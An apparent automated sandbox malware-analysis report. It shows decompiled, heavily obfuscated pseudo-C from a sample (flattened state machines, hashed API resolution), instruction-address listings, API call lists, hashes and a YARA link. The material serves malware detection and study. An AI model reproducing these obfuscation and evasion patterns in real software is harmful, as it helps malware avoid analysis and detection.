								__eflags = _t201 - 0x51fb7187;
								if(_t201 == 0x51fb7187) {
									_t292 = _v136;
									E00A1C32D(_t262, _t283, _t292, _t306);
									goto L107;
								}
								_t111 = _t201;
								__eflags = _t201 - 0x537690ef;
								if(_t201 == 0x537690ef) {
									__eflags = _v160;
									_t111 =  <=  ? 0x7da7801f : 0x7d4a3cd4;
								}
								continue;
							}
							__eflags = _t201 - 0x2e98952d;
							if(_t201 == 0x2e98952d) {
								E00A1CDB9(0xc40, _t283);
								_v136 = _t283;
								_t292 = _v136;
								_t262 = 0x10;
								E00A19F06(0x10, _t269, _t292, _t299, _t304, _t306);
								_v80 = _v136 + _t292;
								_t283 = _v80;
								_v148 =  *_t283;
								_t111 = 0x843901b2;
								continue;
							}
							__eflags = _t201 - 0x2f0fb31e;
							if(_t201 == 0x2f0fb31e) {
								_t283 = _v72;
								_t292 = 0xa202a4;
								__eflags = _t283 - 0xa202a4;
								_t111 =  <  ? 0xb0b3b626 : 0x27daf151;
								goto L1;
							} else {
								_t111 = _t201;
								__eflags = _t201 - 0x34527dc1;
								if(_t201 == 0x34527dc1) {
									_v140 = r12d;
									__eflags = _v140 - 0x2b4;
									_t111 =  <  ? 0x834d46ed : 0x9a2c0e1f;
								}
								continue;
							}
						}
						__eflags = _t201 - 0x13aae926;
						if(_t201 > 0x13aae926) {
							__eflags = _t201 - 0x18cf248b;
							if(_t201 > 0x18cf248b) {
								__eflags = _t201 - 0x18cf248c;
								if(_t201 == 0x18cf248c) {
									__eflags = _v160 - 0x40;
									_t111 =  ==  ? 0x187c6430 : 0x945c137a;
								} else {
									__eflags = _t201 - 0x27daf151;
									if(_t201 == 0x27daf151) {
										E00A1CC2E(_t283, _v104);
										_t111 = 0xf29a3544;
										_t292 = _v120;
										_t269 = _t201;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x28c5e58b;
										if(_t201 == 0x28c5e58b) {
											r13d = 0;
											_v152 = r13d;
											_v164 = r13d;
											_v156 = r13d;
											_t111 = 0xa1a997a0;
										}
									}
								}
								continue;
							}
							__eflags = _t201 - 0x13aae927;
							if(_t201 == 0x13aae927) {
								__eflags = _v148 - 8;
								_t111 =  <  ? 0xeb6755e2 : 0xc10a918f;
								continue;
							}
							__eflags = _t201 - 0x170b999c;
							if(__eflags == 0) {
								E00A1FC4D(_t197, _t262, _t268, _t269, __eflags, _t283, _t292, _t304, _t305, _t306);
								_t111 = _v84;
								continue;
							}
							_t111 = _t201;
							__eflags = _t201 - 0x187c6430;
							if(_t201 != 0x187c6430) {
								continue;
							} else {
								_t262 = 1;
								r8d = 0x510b3a3e;
								r9d = 0x5c;
								E00A1FAD7(1, _t269, _t283, _t292);
								 *_t283();
								goto L107;
							}
						} else {
							__eflags = _t201 - 0x79849ad;
							if(_t201 > 0x79849ad) {
								__eflags = _t201 - 0x79849ae;
								if(_t201 == 0x79849ae) {
									_t111 = 0x63da8ac0;
									_v124 = 0x7530;
								} else {
									__eflags = _t201 - 0xd4e563f;
									if(_t201 == 0xd4e563f) {
										_t269 = 0;
										_t111 = _t271;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0xe1b9813;
										if(_t201 == 0xe1b9813) {
											__eflags = _v160 - 8;
											_t111 =  <  ? 0xbf82bb62 : 0xfbdae760;
										}
									}
								}
							} else {
								__eflags = _t201 - 0xf29a3544;
								if(_t201 == 0xf29a3544) {
									__eflags = (_t269 ^ 0x000000fe) & sil;
									_t111 =  ==  ? 0x28c5e58b : 0x854a966f;
								} else {
									__eflags = _t201 - 0xfbdae760;
									if(_t201 == 0xfbdae760) {
										__eflags = _v160 - 0x40;
										_t111 =  <  ? 0xc7704248 : 0x18cf248c;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x701b759;
										if(_t201 == 0x701b759) {
											_t269 = 0;
											_t111 = _v88;
										}
									}
								}
							}
							continue;
						}
					}
				}
			}



































                                                                                                                                                        0x00a202a4
                                                                                                                                                        0x00a202a4
                                                                                                                                                        0x00a202a4
                                                                                                                                                        0x00a202a4
                                                                                                                                                        0x00a202a4
                                                                                                                                                        0x00a202a4
                                                                                                                                                        0x00a202a4
                                                                                                                                                        0x00a202b7
                                                                                                                                                        0x00a202c6
                                                                                                                                                        0x00a202cc
                                                                                                                                                        0x00a202d7
                                                                                                                                                        0x00a202db
                                                                                                                                                        0x00a202e6
                                                                                                                                                        0x00a202e9
                                                                                                                                                        0x00a202f2
                                                                                                                                                        0x00a202f6
                                                                                                                                                        0x00a202fa
                                                                                                                                                        0x00a20305
                                                                                                                                                        0x00a20309
                                                                                                                                                        0x00a2030e
                                                                                                                                                        0x00a20313
                                                                                                                                                        0x00a20313
                                                                                                                                                        0x00a20313
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a2031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20321
                                                                                                                                                        0x00a20327
                                                                                                                                                        0x00a203d2
                                                                                                                                                        0x00a203d8
                                                                                                                                                        0x00a204b1
                                                                                                                                                        0x00a204b7
                                                                                                                                                        0x00a20656
                                                                                                                                                        0x00a2065c
                                                                                                                                                        0x00a20a72
                                                                                                                                                        0x00a20a77
                                                                                                                                                        0x00a20a7c
                                                                                                                                                        0x00a20a81
                                                                                                                                                        0x00a20a8d
                                                                                                                                                        0x00a20a93
                                                                                                                                                        0x00a20a99
                                                                                                                                                        0x00a20aa0
                                                                                                                                                        0x00a20aa2
                                                                                                                                                        0x00a20abe
                                                                                                                                                        0x00a20ac4
                                                                                                                                                        0x00a20aca
                                                                                                                                                        0x00a20acf
                                                                                                                                                        0x00a20ad8
                                                                                                                                                        0x00a20ade
                                                                                                                                                        0x00a20ae4
                                                                                                                                                        0x00a20aef
                                                                                                                                                        0x00a20af6
                                                                                                                                                        0x00a20af9
                                                                                                                                                        0x00a20b01
                                                                                                                                                        0x00a20b04
                                                                                                                                                        0x00a20b13
                                                                                                                                                        0x00a20662
                                                                                                                                                        0x00a20662
                                                                                                                                                        0x00a20668
                                                                                                                                                        0x00a20b1b
                                                                                                                                                        0x00a20b24
                                                                                                                                                        0x00a20b33
                                                                                                                                                        0x00a2066e
                                                                                                                                                        0x00a2066e
                                                                                                                                                        0x00a20670
                                                                                                                                                        0x00a20676
                                                                                                                                                        0x00a2067c
                                                                                                                                                        0x00a20684
                                                                                                                                                        0x00a20684
                                                                                                                                                        0x00a20676
                                                                                                                                                        0x00a20668
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a2031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2031f
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a204bd
                                                                                                                                                        0x00a204c3
                                                                                                                                                        0x00a20931
                                                                                                                                                        0x00a20936
                                                                                                                                                        0x00a20b60
                                                                                                                                                        0x00a20b60
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a2031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20318
                                                                                                                                                        0x00a204c9
                                                                                                                                                        0x00a204cf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a204d5
                                                                                                                                                        0x00a204d5
                                                                                                                                                        0x00a204d7
                                                                                                                                                        0x00a204dd
                                                                                                                                                        0x00a204e3
                                                                                                                                                        0x00a204e8
                                                                                                                                                        0x00a204ec
                                                                                                                                                        0x00a204ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a204dd
                                                                                                                                                        0x00a204cf
                                                                                                                                                        0x00a203de
                                                                                                                                                        0x00a203e4
                                                                                                                                                        0x00a205e8
                                                                                                                                                        0x00a205ee
                                                                                                                                                        0x00a20a2b
                                                                                                                                                        0x00a20a3a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20a3a
                                                                                                                                                        0x00a205f4
                                                                                                                                                        0x00a205fa
                                                                                                                                                        0x00a20a42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20a42
                                                                                                                                                        0x00a20600
                                                                                                                                                        0x00a20602
                                                                                                                                                        0x00a20608
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2060e
                                                                                                                                                        0x00a20618
                                                                                                                                                        0x00a2061a
                                                                                                                                                        0x00a20bc8
                                                                                                                                                        0x00a20bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20bcd
                                                                                                                                                        0x00a203ea
                                                                                                                                                        0x00a203f0
                                                                                                                                                        0x00a2085c
                                                                                                                                                        0x00a2087f
                                                                                                                                                        0x00a208a1
                                                                                                                                                        0x00a208af
                                                                                                                                                        0x00a208b3
                                                                                                                                                        0x00a208b8
                                                                                                                                                        0x00a208bc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a208bc
                                                                                                                                                        0x00a203f6
                                                                                                                                                        0x00a203fc
                                                                                                                                                        0x00a208ca
                                                                                                                                                        0x00a208d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a208d7
                                                                                                                                                        0x00a20402
                                                                                                                                                        0x00a20404
                                                                                                                                                        0x00a2040a
                                                                                                                                                        0x00a20c2a
                                                                                                                                                        0x00a20410
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20410
                                                                                                                                                        0x00a2040a
                                                                                                                                                        0x00a20333
                                                                                                                                                        0x00a20473
                                                                                                                                                        0x00a20479
                                                                                                                                                        0x00a20624
                                                                                                                                                        0x00a2062a
                                                                                                                                                        0x00a20a50
                                                                                                                                                        0x00a20a58
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20a58
                                                                                                                                                        0x00a20630
                                                                                                                                                        0x00a20636
                                                                                                                                                        0x00a20a60
                                                                                                                                                        0x00a20a65
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20a65
                                                                                                                                                        0x00a2063c
                                                                                                                                                        0x00a2063e
                                                                                                                                                        0x00a20644
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2064e
                                                                                                                                                        0x00a209f9
                                                                                                                                                        0x00a209fe
                                                                                                                                                        0x00a2047f
                                                                                                                                                        0x00a2047f
                                                                                                                                                        0x00a20482
                                                                                                                                                        0x00a20488
                                                                                                                                                        0x00a2048e
                                                                                                                                                        0x00a20494
                                                                                                                                                        0x00a20924
                                                                                                                                                        0x00a20927
                                                                                                                                                        0x00a2049a
                                                                                                                                                        0x00a2049a
                                                                                                                                                        0x00a2049c
                                                                                                                                                        0x00a204a2
                                                                                                                                                        0x00a204a8
                                                                                                                                                        0x00a204a8
                                                                                                                                                        0x00a204a2
                                                                                                                                                        0x00a20494
                                                                                                                                                        0x00a20488
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20479
                                                                                                                                                        0x00a2033f
                                                                                                                                                        0x00a205ad
                                                                                                                                                        0x00a205b3
                                                                                                                                                        0x00a209f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a209f6
                                                                                                                                                        0x00a205b9
                                                                                                                                                        0x00a205bf
                                                                                                                                                        0x00a20a0a
                                                                                                                                                        0x00a20a17
                                                                                                                                                        0x00a205c5
                                                                                                                                                        0x00a205c5
                                                                                                                                                        0x00a205c7
                                                                                                                                                        0x00a205cd
                                                                                                                                                        0x00a205d3
                                                                                                                                                        0x00a205da
                                                                                                                                                        0x00a205de
                                                                                                                                                        0x00a205de
                                                                                                                                                        0x00a205cd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a205bf
                                                                                                                                                        0x00a2034b
                                                                                                                                                        0x00a20788
                                                                                                                                                        0x00a2078e
                                                                                                                                                        0x00a20bd5
                                                                                                                                                        0x00a20bd7
                                                                                                                                                        0x00a20bdd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20c30
                                                                                                                                                        0x00a20c37
                                                                                                                                                        0x00a20c3c
                                                                                                                                                        0x00a20c3e
                                                                                                                                                        0x00a20c3e
                                                                                                                                                        0x00a2079b
                                                                                                                                                        0x00a207a0
                                                                                                                                                        0x00a207a8
                                                                                                                                                        0x00a207b4
                                                                                                                                                        0x00a207b9
                                                                                                                                                        0x00a207bf
                                                                                                                                                        0x00a207c5
                                                                                                                                                        0x00a207ca
                                                                                                                                                        0x00a207d0
                                                                                                                                                        0x00a207d7
                                                                                                                                                        0x00a207da
                                                                                                                                                        0x00a207df
                                                                                                                                                        0x00a207e1
                                                                                                                                                        0x00a207e6
                                                                                                                                                        0x00a207f7
                                                                                                                                                        0x00a20351
                                                                                                                                                        0x00a20357
                                                                                                                                                        0x00a207ff
                                                                                                                                                        0x00a20804
                                                                                                                                                        0x00a2035d
                                                                                                                                                        0x00a2035d
                                                                                                                                                        0x00a20365
                                                                                                                                                        0x00a20378
                                                                                                                                                        0x00a20378
                                                                                                                                                        0x00a20365
                                                                                                                                                        0x00a20357
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2037d
                                                                                                                                                        0x00a2037d
                                                                                                                                                        0x00a20383
                                                                                                                                                        0x00a20415
                                                                                                                                                        0x00a2041b
                                                                                                                                                        0x00a2054c
                                                                                                                                                        0x00a20552
                                                                                                                                                        0x00a2074b
                                                                                                                                                        0x00a20751
                                                                                                                                                        0x00a20ba2
                                                                                                                                                        0x00a20baf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20baf
                                                                                                                                                        0x00a20757
                                                                                                                                                        0x00a2075d
                                                                                                                                                        0x00a20bb7
                                                                                                                                                        0x00a20bc1
                                                                                                                                                        0x00a20bc3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20bc3
                                                                                                                                                        0x00a20763
                                                                                                                                                        0x00a20765
                                                                                                                                                        0x00a2076b
                                                                                                                                                        0x00a20771
                                                                                                                                                        0x00a20780
                                                                                                                                                        0x00a20780
                                                                                                                                                        0x00a20558
                                                                                                                                                        0x00a20558
                                                                                                                                                        0x00a2055e
                                                                                                                                                        0x00a20969
                                                                                                                                                        0x00a2096e
                                                                                                                                                        0x00a20974
                                                                                                                                                        0x00a2097a
                                                                                                                                                        0x00a20984
                                                                                                                                                        0x00a20986
                                                                                                                                                        0x00a20564
                                                                                                                                                        0x00a20564
                                                                                                                                                        0x00a2056a
                                                                                                                                                        0x00a20997
                                                                                                                                                        0x00a2099d
                                                                                                                                                        0x00a209a3
                                                                                                                                                        0x00a209ae
                                                                                                                                                        0x00a209b5
                                                                                                                                                        0x00a209ba
                                                                                                                                                        0x00a209c9
                                                                                                                                                        0x00a209d6
                                                                                                                                                        0x00a209de
                                                                                                                                                        0x00a209ea
                                                                                                                                                        0x00a20570
                                                                                                                                                        0x00a20570
                                                                                                                                                        0x00a20572
                                                                                                                                                        0x00a20578
                                                                                                                                                        0x00a2058b
                                                                                                                                                        0x00a2059f
                                                                                                                                                        0x00a205a3
                                                                                                                                                        0x00a205a3
                                                                                                                                                        0x00a20578
                                                                                                                                                        0x00a2056a
                                                                                                                                                        0x00a2055e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20552
                                                                                                                                                        0x00a20421
                                                                                                                                                        0x00a20427
                                                                                                                                                        0x00a206cc
                                                                                                                                                        0x00a206d2
                                                                                                                                                        0x00a20c0b
                                                                                                                                                        0x00a20313
                                                                                                                                                        0x00a20313
                                                                                                                                                        0x00a20313
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20313
                                                                                                                                                        0x00a20313
                                                                                                                                                        0x00a206d8
                                                                                                                                                        0x00a206de
                                                                                                                                                        0x00a20b56
                                                                                                                                                        0x00a20b5b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20b5b
                                                                                                                                                        0x00a206e4
                                                                                                                                                        0x00a206e6
                                                                                                                                                        0x00a206ec
                                                                                                                                                        0x00a206f2
                                                                                                                                                        0x00a20701
                                                                                                                                                        0x00a20701
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a206ec
                                                                                                                                                        0x00a2042d
                                                                                                                                                        0x00a20433
                                                                                                                                                        0x00a208e4
                                                                                                                                                        0x00a208e9
                                                                                                                                                        0x00a208ee
                                                                                                                                                        0x00a208f3
                                                                                                                                                        0x00a208f8
                                                                                                                                                        0x00a2090a
                                                                                                                                                        0x00a2090f
                                                                                                                                                        0x00a20916
                                                                                                                                                        0x00a2091a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2091a
                                                                                                                                                        0x00a20439
                                                                                                                                                        0x00a2043f
                                                                                                                                                        0x00a20be5
                                                                                                                                                        0x00a20bed
                                                                                                                                                        0x00a20bf4
                                                                                                                                                        0x00a20c01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20445
                                                                                                                                                        0x00a20445
                                                                                                                                                        0x00a20447
                                                                                                                                                        0x00a2044d
                                                                                                                                                        0x00a20453
                                                                                                                                                        0x00a2045c
                                                                                                                                                        0x00a2046b
                                                                                                                                                        0x00a2046b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2044d
                                                                                                                                                        0x00a2043f
                                                                                                                                                        0x00a20389
                                                                                                                                                        0x00a2038f
                                                                                                                                                        0x00a204f6
                                                                                                                                                        0x00a204fc
                                                                                                                                                        0x00a20709
                                                                                                                                                        0x00a2070f
                                                                                                                                                        0x00a20b6e
                                                                                                                                                        0x00a20b7b
                                                                                                                                                        0x00a20715
                                                                                                                                                        0x00a20715
                                                                                                                                                        0x00a2071b
                                                                                                                                                        0x00a20b88
                                                                                                                                                        0x00a20b8d
                                                                                                                                                        0x00a20b92
                                                                                                                                                        0x00a20b97
                                                                                                                                                        0x00a20721
                                                                                                                                                        0x00a20721
                                                                                                                                                        0x00a20723
                                                                                                                                                        0x00a20729
                                                                                                                                                        0x00a2072f
                                                                                                                                                        0x00a20732
                                                                                                                                                        0x00a20737
                                                                                                                                                        0x00a2073c
                                                                                                                                                        0x00a20741
                                                                                                                                                        0x00a20741
                                                                                                                                                        0x00a20729
                                                                                                                                                        0x00a2071b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2070f
                                                                                                                                                        0x00a20502
                                                                                                                                                        0x00a20508
                                                                                                                                                        0x00a20944
                                                                                                                                                        0x00a20951
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20951
                                                                                                                                                        0x00a2050e
                                                                                                                                                        0x00a20514
                                                                                                                                                        0x00a20959
                                                                                                                                                        0x00a2095e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2095e
                                                                                                                                                        0x00a2051a
                                                                                                                                                        0x00a2051c
                                                                                                                                                        0x00a20522
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20528
                                                                                                                                                        0x00a2052a
                                                                                                                                                        0x00a2052f
                                                                                                                                                        0x00a20535
                                                                                                                                                        0x00a2053b
                                                                                                                                                        0x00a20545
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a20545
                                                                                                                                                        0x00a20395
                                                                                                                                                        0x00a20395
                                                                                                                                                        0x00a2039b
                                                                                                                                                        0x00a2068d
                                                                                                                                                        0x00a20693
                                                                                                                                                        0x00a20b3b
                                                                                                                                                        0x00a20b40
                                                                                                                                                        0x00a20699
                                                                                                                                                        0x00a20699
                                                                                                                                                        0x00a2069f
                                                                                                                                                        0x00a20b4d
                                                                                                                                                        0x00a20b4f
                                                                                                                                                        0x00a206a5
                                                                                                                                                        0x00a206a5
                                                                                                                                                        0x00a206a7
                                                                                                                                                        0x00a206ad
                                                                                                                                                        0x00a206b7
                                                                                                                                                        0x00a206c4
                                                                                                                                                        0x00a206c4
                                                                                                                                                        0x00a206ad
                                                                                                                                                        0x00a2069f
                                                                                                                                                        0x00a203a1
                                                                                                                                                        0x00a203a1
                                                                                                                                                        0x00a203a7
                                                                                                                                                        0x00a20815
                                                                                                                                                        0x00a20822
                                                                                                                                                        0x00a203ad
                                                                                                                                                        0x00a203ad
                                                                                                                                                        0x00a203b3
                                                                                                                                                        0x00a2082e
                                                                                                                                                        0x00a2083b
                                                                                                                                                        0x00a203b9
                                                                                                                                                        0x00a203b9
                                                                                                                                                        0x00a203bb
                                                                                                                                                        0x00a203c1
                                                                                                                                                        0x00a203c7
                                                                                                                                                        0x00a203c9
                                                                                                                                                        0x00a203c9
                                                                                                                                                        0x00a203c1
                                                                                                                                                        0x00a203b3
                                                                                                                                                        0x00a203a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a2039b
                                                                                                                                                        0x00a2038f
                                                                                                                                                        0x00a20318

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A1CDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00A20A77), ref: 00A1CE20
                                                                                                                                                        • SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,FD91BC21), ref: 00A209AE
                                                                                                                                                          • Part of subcall function 00A13A22: CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,00A209DE), ref: 00A13A4E
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00A20C3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000019.00000002.634304009.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                        • Associated: 00000019.00000002.634295050.0000000000A10000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634331329.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634341347.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateCreateExitHeapMutexProcessSleep
                                                                                                                                                        • String ID: 0u$?VN$?VN$c/9$c/9$Ug$Ug
                                                                                                                                                        • API String ID: 3080258361-3375559661
                                                                                                                                                        • Opcode ID: 408de1cb32e6a23b8f6d86f31cac7ebb337cbef467db620d4c6511f590c7df8b
                                                                                                                                                        • Instruction ID: ccd47054f4847b3bcea83e80af2f77930685ae87dcbce6ad1703f1af8951b778
                                                                                                                                                        • Opcode Fuzzy Hash: 408de1cb32e6a23b8f6d86f31cac7ebb337cbef467db620d4c6511f590c7df8b
                                                                                                                                                        • Instruction Fuzzy Hash: B812EB717182658BCB6CC71CF4A0A3EA6A1EB99744F60013DFA4BDBF66D628CC409F45
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00A14554, Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 505processCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                        			E00A14554(long long __rax, void* __rcx, void* __r11) {
				long long _v72;
				signed long long _v80;
				signed long long _v88;
				signed long long _v96;
				void* _v104;
				intOrPtr _v108;
				signed long long _v120;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				void* _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				void* _v176;
				void* _v184;
				long long _v192;
				void* _v200;
				void* _v208;
				signed int _v212;
				intOrPtr _v216;
				long long _v224;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				void* _v248;
				intOrPtr _v252;
				void* _v264;
				signed int _v268;
				void* _t155;
				void* _t167;
				void* _t179;
				intOrPtr _t207;
				void* _t215;
				intOrPtr _t277;
				void* _t278;
				long long _t302;
				signed long long _t307;
				signed long long _t315;
				void* _t327;
				signed long long _t341;
				void* _t342;
				signed long long _t346;
				void* _t350;
				void* _t351;
				signed long long _t353;
				signed long long _t354;

				_t302 = __rax;
				_t350 =  &_v248;
				_t342 = __rcx;
				E00A1CDB9(0x64, __rax);
				_v264 = _t302;
				r14d = 0;
				r8d = 0x64;
				E00A1C8BC(0, _t302, _v264, _t351, __r11);
				_v104 = _t342 + 0xadc;
				_t341 = _v104;
				r8d = 0x328b7e5;
				r9d = 0x57;
				E00A1FAD7(1, _t278, _t302, _v264);
				_t327 = _t341;
				r8d = 0x64;
				 *_t302();
				_v72 = _t302;
				r13d = 4;
				_t346 =  &_v248 | _t353;
				_v80 =  &_v144 | _t353;
				_v88 =  &_v176 | _t353;
				_t307 =  &_v160;
				_t354 = _t353 | _t307;
				_t155 = 0xbd3af00e;
				L1:
				while(1) {
					L1:
					while(1) {
						while(_t155 > 0x156d8657) {
							if(_t155 <= 0x47698b65) {
								if(_t155 <= 0x26d898f6) {
									if(_t155 == 0x156d8658) {
										_t167 = 0x3661a3a2;
										L88:
										_t155 =  ==  ? 0xc2dc12f5 : _t167;
										continue;
									}
									if(_t155 == 0x17687833) {
										L61:
										_t307 = _v200;
										_t155 = 0xaac379a3;
										continue;
									}
									if(_t155 != 0x256502ce) {
										continue;
									}
									_v248 = r14b;
									_v244 = 0x69babbe9;
									_v240 = 0x3790a6e1;
									_v236 = 0x1992b0c1;
									if(_v248 != r14b) {
										L41:
										_t327 = _v224;
										r8d = 0xb;
										E00A1CA65(_t327, _t346, _t351);
										_t155 =  ==  ? 0x57f7ec6f : 0x79c90ec8;
										r12d = _v108;
										continue;
									}
									do {
										 *(_t350 + 0x40 + _t307 * 4) =  *(_t350 + 0x40 + _t307 * 4) & 0xe608375b |  !( *(_t350 + 0x40 + _t307 * 4)) & 0x19f7c8a4;
										_t327 = _t327 + 1;
										_t307 = _t307 + 1;
									} while (_t307 != 4);
									goto L41;
								}
								if(_t155 > 0x3661a3a1) {
									if(_t155 == 0x3661a3a2) {
										_t167 = 0x7953da70;
										goto L88;
									}
									if(_t155 == 0x4459eabe) {
										r14d = _t207;
										r8d = 0x2db58ff7;
										r9d = 0x11;
										E00A1FAD7(1, _t278, _t307, _t327);
										FindCloseChangeNotification(??); // executed
										E00A1CC2E(_t307, _v96);
										 *_v264 = 0x56;
										 *((char*)(_v264 + 1)) = _t341 + 0x41;
										_t307 = _v264;
										 *((char*)(_t307 + 2)) = 0;
										r8d = 0x7328b7e5;
										r9d = 0x59;
										E00A1FAD7(1, _t278, _t307, _v264);
										_t327 = _v104;
										_t207 = r14d;
										r14d = 0;
										 *_t307();
										_t155 = 0x47698b66;
										_v216 = _t277;
									}
									continue;
								}
								if(_t155 == 0x26d898f7) {
									_v176 = r14b;
									_v172 = 0x1883419a;
									_v168 = 0x45ab62af;
									_v164 = 0x6b874fbe;
									if(_v176 != r14b) {
										L71:
										_t327 = _v224;
										r8d = 0xb;
										E00A1CA65(_t327, _v88, _t351);
										_t155 =  ==  ? 0xf699f5c5 : 0x82cc269e;
										continue;
									}
									do {
										 *(_t350 + 0x88 + _t307 * 4) = ( *(_t350 + 0x88 + _t307 * 4) & 0xb7e568a1 |  !( *(_t350 + 0x88 + _t307 * 4)) & 0x481a975e) ^ 0x23f8a085;
										_t327 = _t327 + 1;
										_t307 = _t307 + 1;
									} while (_t307 != 4);
									goto L71;
								} else {
									if(_t155 == 0x2d4edb4e) {
										_t155 =  ==  ? 0xc2dc12f5 : 0xedb8c621;
										_v212 = 0;
									}
									continue;
								}
							}
							if(_t155 <= 0x6b450fde) {
								if(_t155 <= 0x4a7d68ff) {
									if(_t155 == 0x498446a6) {
										r8d = 0x86fb7f30;
										r9d = 0x60;
										E00A1FAD7(1, _t278, _t307, _t327);
										_t327 = _v120;
										 *_t307(); // executed
										_t155 =  ==  ? 0x4459eabe : 0x90bf802d;
										_t207 = _v252;
										_t277 = _v252;
										continue;
									}
									if(_t155 != 0x47698b66) {
										continue;
									}
									return _v216;
								} else {
									if(_t155 == 0x4a7d6900) {
										_t155 =  ==  ? 0xc3b70504 : 0x47698b66;
										_v216 = r15d;
									} else {
										if(_t155 == 0x57f7ec6f) {
											_t155 = 0x79c90ec8;
											r12d = 0x10;
										}
									}
									continue;
								}
							}
							if(_t155 > 0x7953da6f) {
								if(_t155 == 0x7953da70) {
									_t167 = 0x2d4edb4e;
									goto L88;
								}
								if(_t155 == 0x79c90ec8) {
									_v252 = r12d;
									_t155 =  ==  ? 0x498446a6 : 0x4459eabe;
									_t277 = _v252;
								}
								continue;
							}
							if(_t155 == 0x6b450fdf) {
								_t307 = _v264;
								_t179 = 0x4a7d6900;
								_t215 = 0x42fedaa;
								L63:
								_t155 =  ==  ? _t215 : _t179;
								r15d = 0;
								continue;
							}
							if(_t155 != 0x74143c86) {
								continue;
							}
							_v248 = r14b;
							_v244 = 0x76969af2;
							_v240 = 0x52bdad8b;
							_v236 = 0x37c5c8a5;
							if(_v248 != r14b) {
								L10:
								_t327 = _v224;
								r8d = 8;
								E00A1CA65(_t327, _t346, _t351);
								_t155 =  ==  ? 0x84ce7a97 : 0x256502ce;
								continue;
							} else {
								do {
									 *(_t350 + 0x40 + _t307 * 4) =  *(_t350 + 0x40 + _t307 * 4) & 0xc83a375a |  !( *(_t350 + 0x40 + _t307 * 4)) & 0x37c5c8a5;
									_t327 = _t327 + 1;
									_t307 = _t307 + 1;
								} while (_t307 != 4);
								goto L10;
							}
						}
						if(_t155 > 0xbd3af00d) {
							if(_t155 <= 0xd01fc255) {
								if(_t155 == 0xbd3af00e) {
									_t155 =  ==  ? 0x8161912a : 0x9e0aa110;
								} else {
									if(_t155 == 0xc2dc12f5) {
										_t155 = 0xedb8c621;
										_v212 = _v268;
									} else {
										if(_t155 == 0xc3b70504) {
											E00A1CDB9(0x130, _t307);
											_v96 = _t307;
											_v208 = _v96;
											_t307 = _v208;
											 *_t307 = 0x130;
											_t277 = 1;
											r8d = 0x29f7579a;
